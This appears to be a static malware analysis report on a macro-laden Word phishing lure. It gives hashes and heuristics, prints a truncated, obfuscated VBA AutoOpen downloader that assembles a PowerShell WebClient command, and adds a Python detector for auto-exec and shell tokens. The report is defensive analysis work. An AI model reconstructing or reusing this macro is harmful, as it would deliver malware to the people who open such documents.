Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e9a25ccb7e3d4e6a…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 190.4 KB
Created: 2017-12-07 16:40:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: 4fbb8cea68d03e05938180c091c2d8ce
SHA-1: b62ce7166813b973dbb00dfded9686d112cd54a0
SHA-256: e9a25ccb7e3d4e6a36bc988c6ac7fd1eefb9626482ba5cb8b183359ada735424
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is an OLE (Word binary) document carrying a VBA project with an AutoOpen entry point, so the macro runs as soon as the document is opened with macros enabled. The macro calls Shell(), a strong indicator of malicious intent in a document. The recovered source (macros.bas, below) assembles its command line at run time from Mid() slices of long padded string literals in which the tokens QnW and bNl are interleaved with the real text. The fragments that survive de-junking are PowerShell: System.Net.WebClient, -rEPlAcE with [cHAR]92, a Split() call, and an Env:PubliC[13]+...[5]+'X' construction of the kind used to spell the Invoke-Expression alias from characters of $env:Public. That is consistent with a downloader that fetches and executes a second-stage payload; no download URL is recoverable from the preview shown here, and the two URLs extracted from the document body are not indicators (see the EMBEDDED_URL finding). The ClamAV signature Img.Dropper.PhishingLure-6443153-0 supports classification as a dropper delivered as a phishing lure.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings)
    The document contains VBA macro code.
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The macro calls Shell(), i.e. it launches an external process from the document.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    The VBA project defines AutoOpen, so the macro runs automatically when the document is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This rule catches p-code-only documents and documents whose source extraction fails, where no readable source is available.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen for which no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a VBA project was recovered as well (macros.bas, below), so read this finding alongside OLE_VBA_AUTOOPEN.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
    • http://QnW+bNl+biQpwHDj4zF4X (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    Neither URL is a network indicator. The first is a false hit on an "http://" substring inside the padded obfuscation strings (it begins with the QnW and bNl padding tokens and has no valid hostname); the second is the standard DrawingML XML namespace found in any document with drawing content.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 76880 bytes
SHA-256: 00b3457c233c576639a69c435c8bc2783c8b3a34ad22ae471b4be45f626a8927

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "GCobfBoa"
Function ERpwmCJmS()
JOtHq = Array(UCase("SfYYZujZDzic" + "QRPzDjruV" + "IHKEuOzzh" + "ZHSTDiAIHQDj" + "cbGKVpDT"), UCase("wQQROpoKFAArq" + "zwvUiinF" + "czidoDcH" + "RhKBDmTKTwK" + "fQlRHOZ"))
EhCRRrE = Mid("jl8hWRwU3rw7VACCwpvZaMz0kRwjfn07W+QnW/QnW+QnWZQbNl+bNlnbNl+bNlW'+'+QnW9'+'v.QnW+QnWSplQnW+QnWit(QnW+QnWZQnW+QnW9v,ZQnW+QnW9v)QnW+QnW;PQnW+QnWxbNl'+'+bN'+'lRkarapaQnW+QnWs = PxQnbNl+bNlW+QbNl+bNlnWRnsQnW+QnWadQnW+QnWasd.Vv", 33, 187)
daTYUmuaMn = Array(UCase("AYQwhZk" + "DiQAULhlioPD" + "LsUuQiViGn" + "XdIUPtl" + "ajvlsklvuppRJ"), UCase("hpjwDRuOHw" + "PcqDNWoCYcpQGb" + "ijbpQWrD" + "ToSqUwMZwrcHus" + "TBOksrYZUsnK"))
lmivzrKAPA = Array(UCase("UkEqFoSfMA" + "dsXZIwzt" + "BYPqvHwi" + "LjpCmIjdUwOUnz" + "phKHqdTKV"), UCase("TwVOuwrji" + "TRaFOsf" + "AioNavAOwps" + "rWUlTMLPZw" + "lEvzYGEtzz"))
pzBiUE = Array(UCase("iUSaBAQiwkijjA" + "DqdbwHLnz" + "RULUPZuEfaJWq" + "sSnDXik" + "Pivnpfo"), UCase("ShVjjfFJhKnf" + "ZJjzXii" + "IPOGNFjZcj" + "PsIcAHWNM" + "VNuFzpVOnSz"))
wENfMA = Mid("TSERBkO+'+'QnWZQbNl+bNlnW+QnWZ9vQnW+QnW PjFiivJ8Q", 8, 33)
UCAmls = Array(UCase("JrcFVZNjBCrOK" + "zomChQECGCIfwc" + "rwuWCNdI" + "qlBtzVuql" + "bRSqQhl"), UCase("kZwqdkZJ" + "wsHjTjY" + "vOLFkISt" + "BpZFipRGsjRAI" + "UnPzwiTHl"))
YLJCBfon = Array(UCase("SKRHcVZY" + "FaZQLRjjrBVR" + "mCTBOPLLoRRFa" + "KsfAnntQmVpnYo" + "vQbsbYPobHKN"), UCase("QIHLlUWnMB" + "izVPzLarWdtB" + "MwZuEDsdZTziO" + "BESuiPtNiCA" + "PhSrvXHRwnubi"))
IEHJUX = Array(UCase("bufMKURsB" + "jVQBXFioZGi" + "VmMRWtFJj" + "RdMBGoJLfIZLw" + "uIcaWWqllI"), UCase("tzszXmszrD" + "pWzpfNaVtKps" + "OQinKwfsEc" + "pQNIVhNE" + "ITFajqcLP"))
hhMfVns = Mid("33b1lvdipFjN9Sa62uuwsXkQnW+QbNl+bNlnWe-'+'I'+'QnW+QnWtem(PQnW+Qn'+'WxRhuasQnW+QnW);QnW+QnWbreQnW+QnUWbs4", 23, 77)
UnztHh = Array(UCase("IFEdWljh" + "nDiKmzwTXu" + "nLKiYcWwj" + "JrLZGnJAf" + "GiIfnMNUU"), UCase("TXjTVwuVFuOnBL" + "MWkfJpTrfIF" + "fuLOCcj" + "lKsEKtnvlATjzB" + "pcpKJAjALPs"))
ddTijMo = Array(UCase("ODGVjGIEn" + "XtlunAPzSAMwl" + "OvLDHTVUdpN" + "iviBNcaK" + "OhLnfbcsPBSSf"), UCase("ovEwTXCP" + "jiRUVRmjWahzNz" + "csscOovqD" + "qFJjGnqwmiJNG" + "acRwrzGa"))
YXwsDjXLIrD = Array(UCase("qdimccTsJVASUk" + "OjVCWCYhwZvkV" + "UaNmqPNjFE" + "mohHLuXmF" + "vfzauSwk"), UCase("hswWoumjd" + "diiRlkNrZn" + "XwPLYuNLvwR" + "sWYoRsNYNtQbcR" + "OqhbWwhKu"))
JuIoMb = Mid("760SiCBZ9J -rEPlAcE bNlkA8bNl,[cHAR]92  -rEPlAcE([cHAR]75+[cHAR]101+[cHAR]109),[cHAR]124)Dfv.( YCUEnv:PubliC[13]+YCUeNv:pUbL'+'iC[5]+bN'+'lXbNl)').replACE('bNl'kwA86rOjt7GVrwawzt", 11, 150)
wlbcIHlCdz = Array(UCase("oUaiaBHlnOffLd" + "PnrBbVG" + "llBlWzzFh" + "JVMjIQzis" + "zbbPzOjEGF"), UCase("ahFosYPkmoIzQC" + "rjiaDwdk" + "KKmmHSvzc" + "jnGrPrhtG" + "qdLMrXzZfBCz"))
qwlbB = Array(UCase("LQAYUiZMlmuN" + "vwMORdhnjGfzVO" + "vzKMiFGcMA" + "LrPqfUBulcJiQh" + "vbJUZwUD"), UCase("lbhiqoWzO" + "RpXsbLwbcs" + "RtfRJiSsaurn" + "FDnSDzGJUtPXXj" + "JbXrLiTiCQjK"))
LjBhuYiV = Array(UCase("mOpwZUBwYZJc" + "DPAlYSNsJpkhS" + "mEIcdZMI" + "ITZzoihYDUSMjZ" + "KTJrdZEQGNOrPw"), UCase("DduUsRwSYNb" + "hNzuGfJSJ" + "UfVDCTman" + "bXRpRMhhL" + "kiBIXDH"))
fCmcEKj = Mid("GVwz5DbNl+bNlQnWt QnW+QnWSysQnW+QnWtem.Net.WebClient;QnW+QnWPxRQnW+QnWnsabNl+bNldQnW+QbNl+'+'bNlnWaQnW+QnWsQnW+QnW'+'d QnW+QnW= QnW+QnWn5uR5qv5MMjUD6vBi", 7, 130)
rRjCV = Array(UCase("HncZBYn" + "XfXflczAPu" + "vjjzXzcUlVkB" + "mCCjQpVzwL" + "vzMZBWimWvPU"), UCase("nFZZDBBndA" + "jaQkZZmwYwDXn" + "TPnzfbX" + "isKQwwvJzSzU" + "bFzMzIQvZkimW"))
mFQiaXXm = Array(UCase("ILGiVmJPw" + "PfjzZJpKvKcuw" + "GIfpdNfwMTS" + "LwBffCNsRjU" + "EsTNIwqNNdXNG"), UCase("llIQTMfzzs" + "QfajFKao" + "lltSqPdEOhYoY" + "QbjBMHHG" + "bErRQhHTzYOiAr"))
ClBwn = Array(UCase("LfBHaPft" + "hsunKZOoGiEuRY" + "kUjjRzPtWzzwcb" + "jVWBuLWVwYlrvk" + "PtGBXGfwbzRz"), UCase("qNalNGwiYP" + "nOwkIjHUIlh" + "raDtAWu" + "cMw
... (truncated)
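To make the OLE_VBA_PCODE_AUTOEXEC_EXEC rule and the string obfuscation in the preview concrete, here is an added example. It is not the analysis platform's tooling and not part of the sample: it implements VBA Mid() slicing over two of the padded string literals copied from the preview above (the fCmcEKj and hhMfVns lines), a deliberately crude de-junking pass, and the auto-exec-plus-execution-token rule the heuristic describes, applied here to decoded source rather than to a p-code stream. The SAMPLE_VBA text, the AutoOpen/Shell stub inside it, the token regexes and the assumption that QnW and bNl are padding tokens are the analyst's constructions, not content of the page.

```python
"""Added example, not the report's own tooling: VBA Mid() slicing, crude junk-token
stripping, and an auto-exec + execution-token heuristic over decoded VBA source.
Runs offline on constructed input."""
import re

# Padding tokens seen between real characters in the preview's Mid() arguments.
# ANALYST ASSUMPTION: both are junk separators the later stage strips; the
# -rEPlAcE / .replACE fragments in the dump point that way.
JUNK_TOKENS = ("bNl", "QnW")

# Two Mid() string arguments copied verbatim from the macros.bas preview.
FRAG_WEBCLIENT = ("GVwz5DbNl+bNlQnWt QnW+QnWSysQnW+QnWtem.Net.WebClient;QnW+QnWPxRQnW+QnWnsabNl+bNld"
                  "QnW+QbNl+'+'bNlnWaQnW+QnWsQnW+QnW'+'d QnW+QnW= QnW+QnWn5uR5qv5MMjUD6vBi")
FRAG_INVOKE = ("33b1lvdipFjN9Sa62uuwsXkQnW+QbNl+bNlnWe-'+'I'+'QnW+QnWtem(PQnW+Qn'+'WxRhuasQnW+QnW);"
               "QnW+QnWbreQnW+QnUWbs4")

# CONSTRUCTED VBA text: the two Mid() lines with their real offsets, plus a stand-in
# AutoOpen/Shell entry point (the preview is truncated before the sample's real one;
# the OLE_VBA_AUTOOPEN and OLE_VBA_SHELL findings say both exist).
SAMPLE_VBA = f"""Attribute VB_Name = "GCobfBoa"
Function ERpwmCJmS()
fCmcEKj = Mid("{FRAG_WEBCLIENT}", 7, 130)
hhMfVns = Mid("{FRAG_INVOKE}", 23, 77)
End Function

Sub AutoOpen()
    ' constructed stand-in, not the sample's real entry point
    cmd = ERpwmCJmS()
    Shell cmd, vbHide
End Sub
"""

MID_CALL = re.compile(r'Mid\("([^"]*)",\s*(\d+),\s*(\d+)\)')
AUTOEXEC = re.compile(
    r"\b(AutoOpen|Auto_Open|AutoExec|AutoClose|AutoNew|Document_Open|Workbook_Open)\b", re.I)
EXEC_TOKENS = re.compile(
    r"\b(WScript\.Shell|ShellExecute|Shell|CreateObject|powershell|WebClient|"
    r"DownloadFile|DownloadString|URLDownloadToFile|Invoke-Item|iex)\b", re.I)


def vba_mid(s, start, length):
    """VBA Mid(s, start, length): 1-based start, returns at most `length` characters."""
    if start < 1 or length < 0:
        raise ValueError("VBA Mid() requires start >= 1 and length >= 0")
    return s[start - 1:start - 1 + length]


def strip_junk(fragment):
    """Crude de-junking for triage only: drop quote/concat punctuation, then delete the
    padding tokens until none remain. Lossy: genuine '+' and quotes go too (e.g. in
    [cHAR]75+[cHAR]101), so use it to read fragments, not to rebuild the next stage."""
    out = fragment.replace("'", "").replace("+", "")
    changed = True
    while changed:
        changed = False
        for tok in JUNK_TOKENS:
            new = out.replace(tok, "")
            if new != out:
                out, changed = new, True
    return out


def decode_mid_fragments(vba_text):
    """Evaluate every Mid("<literal>", start, len) in the source and de-junk the slice."""
    return [strip_junk(vba_mid(lit, int(a), int(b))) for lit, a, b in MID_CALL.findall(vba_text)]


def scan_vba(vba_text):
    """Auto-exec + execution-token rule over decoded source. Execution tokens are also
    searched in the de-junked fragments so split strings do not hide them."""
    decoded = decode_mid_fragments(vba_text)
    haystack = vba_text + "\n" + "\n".join(decoded)
    autoexec = sorted({m.group(1) for m in AUTOEXEC.finditer(vba_text)})
    exec_tokens = sorted({m.group(1) for m in EXEC_TOKENS.finditer(haystack)})
    return {
        "autoexec": autoexec,
        "exec_tokens": exec_tokens,
        "decoded_fragments": decoded,
        "flagged": bool(autoexec and exec_tokens),
    }


if __name__ == "__main__":
    for key, value in scan_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Run as-is, the two slices de-junk to "t System.Net.WebClient;PxRnsadasd = n" and "ke-Item(PxRhuas);breQn": enough to recognise a PowerShell WebClient download followed by what reads like the tail of an Invoke-Item call, which is the level of confidence the heuristic needs. The stripping deletes real '+' characters along with the padding, so recover the actual second stage from a debugger or from olevba --deobf rather than from this output.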